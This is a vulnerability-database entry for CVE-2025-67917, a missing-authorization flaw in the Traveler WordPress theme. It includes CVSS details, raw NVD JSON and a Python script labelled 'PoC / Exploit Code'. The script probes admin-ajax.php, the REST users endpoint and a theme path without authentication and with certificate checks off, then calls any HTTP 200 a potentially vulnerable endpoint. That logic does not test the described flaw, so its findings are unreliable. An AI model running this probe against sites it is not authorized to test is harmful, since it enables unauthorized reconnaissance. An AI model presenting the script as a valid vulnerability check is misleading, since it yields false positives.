Security Vulnerability Report
中文
CVE-2025-67917 CVSS 6.5 MEDIUM

CVE-2025-67917

Published: 2026-01-08 10:15:51
Last Modified: 2026-04-27 18:16:49

Description

Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Traveler: from n/a through <= 3.2.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Traveler Theme <= 3.2.6
Traveler Theme (all versions from n/a through 3.2.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67917 PoC - Traveler Theme Broken Access Control # Target: WordPress site with Traveler theme <= 3.2.6 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67917 Missing Authorization in Traveler theme """ # Common vulnerable endpoints in Traveler theme vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users', '/wp-content/themes/traveler/st_templates/user/', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } print(f'[*] Testing target: {target_url}') print(f'[*] CVE-2025-67917: Traveler theme Missing Authorization') for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Test unauthenticated access to privileged functions response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f'[+] Potential vulnerable endpoint found: {url}') print(f'[+] Status code: {response.status_code}') print(f'[+] Response length: {len(response.text)} bytes') elif response.status_code == 403: print(f'[-] Protected endpoint: {url}') else: print(f'[*] Endpoint status: {url} - {response.status_code}') except requests.exceptions.RequestException as e: print(f'[-] Error testing {url}: {str(e)}') print('\n[*] Note: This is a basic PoC. Full exploitation requires') print('[*] identifying specific vulnerable functions in the theme.') print('[*] Refer to Patchstack advisory for detailed exploitation steps.') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-67917_poc.py <target_url>') print('Example: python cve-2025-67917_poc.py http://example.com') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67917", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:50.593", "lastModified": "2026-04-27T18:16:48.713", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Traveler: from n/a through <= 3.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}